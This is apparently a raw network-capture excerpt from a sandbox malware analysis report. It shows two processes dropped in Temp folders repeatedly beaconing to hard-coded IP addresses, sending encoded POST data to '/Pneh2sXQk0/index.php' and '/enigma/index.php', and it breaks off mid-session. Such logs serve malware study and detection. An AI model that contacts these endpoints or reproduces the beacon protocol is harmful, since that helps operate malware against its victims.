                                                                                                                                                                                                                                      Apr 19, 2024 03:32:42.790445089 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:43.039764881 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      595192.168.2.550441193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:43.187181950 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:43.439666033 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      596192.168.2.550442193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:43.417484999 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:43.666038990 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      597192.168.2.550443193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:43.806570053 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:44.052470922 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      598192.168.2.550444193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:43.921329975 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:44.171013117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      599192.168.2.550445193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:44.299585104 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:44.547992945 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      600192.168.2.550446193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:44.521615028 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:44.766058922 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      601192.168.2.550447193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:44.913885117 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:45.163983107 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      602192.168.2.550448193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:45.017074108 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:45.268862963 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      603192.168.2.550449193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:45.413383961 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:45.662151098 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      604192.168.2.550450193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:45.629239082 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:45.872068882 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      605192.168.2.550451193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.020427942 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.263108969 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      606192.168.2.550452193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.127648115 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.377650023 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      607192.168.2.550453193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.508724928 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.755616903 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      608192.168.2.550454193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.746455908 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:46.996206999 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      609192.168.2.550455193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:47.120392084 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:47.368988991 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      610192.168.2.550456193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:47.247963905 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
